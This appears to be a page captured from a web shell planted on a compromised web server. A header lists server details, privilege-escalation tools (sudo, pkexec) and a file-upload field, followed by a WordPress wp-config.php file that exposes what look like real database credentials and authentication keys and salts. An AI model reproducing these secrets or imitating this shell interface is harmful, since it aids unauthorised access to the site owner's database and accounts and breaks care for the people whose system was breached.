| Server IP : 154.62.226.11 / Your IP : 216.73.217.146 Web Server : LiteSpeed System : Linux srv830873868 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64 User : gilan3591 ( 1111) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/gilang88.net/public_html/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'i7FWmIdlSjEdwQ' );
/** Database username */
define( 'DB_USER', 'i7FWmIdlSjEdwQ' );
/** Database password */
define( 'DB_PASSWORD', 'Ub8FRYXf9AJBwJ' );
/** Database hostname */
define( 'DB_HOST', 'localhost:3306' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'KxohU8Jr0nPVP6:WFxi9Cmim|07s6c4:^PVaF v*zS|J pKniv7i3e|_?]tXr[z%' );
define( 'SECURE_AUTH_KEY', '$Z]#Gh|_(9K%=Bs(L1zKlF9+iSLcZ,Di0`Of!? iPOm<;@-D>*@c<LwBr9CW<F5b' );
define( 'LOGGED_IN_KEY', '?K>-u)BzLx]<J ^N@*|^txwU`I`Epm3jo^#%=ghD7pUH*UmmD9>Fdg*=]gcsAWfu' );
define( 'NONCE_KEY', 'R%UwxQGifR&NHQ?AlqR*h[E9W|*9F.K6yWKYU1V}*+_6PvcA*|eI9S(H2#>65iMN' );
define( 'AUTH_SALT', ' E&`AWVnd70007AsdiN!~9Tn/$atf?E)%TreC:Q=V07V;08.~je@JeHtK@,Hx^XA' );
define( 'SECURE_AUTH_SALT', '0-qgSd%Dl1VhCQy@11,^-c[h9O(8R*cft)z}b(:);VoS3=wy<z4Jiv=62aN`Ov%p' );
define( 'LOGGED_IN_SALT', '1CGo:Nzr4BQbo(IF[ixJ*0z{:qJ&$WR{c$6p2l~?YTy#XwV^YBuk6)C$Q0~I?R*Y' );
define( 'NONCE_SALT', 'o.}N5WpPYV7)c|DWWqw=)y>^KDH?^HBwWRG6{vRTXbV~-%[L)G,uh*.R1s%)sDIJ' );
define( 'WP_CACHE_KEY_SALT', ':+Tdg6+?79$*,lORjINkV:N..CBc(hdZI>UlN5^l(5!6K#.Idua4d3|`[5R.0$H?' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';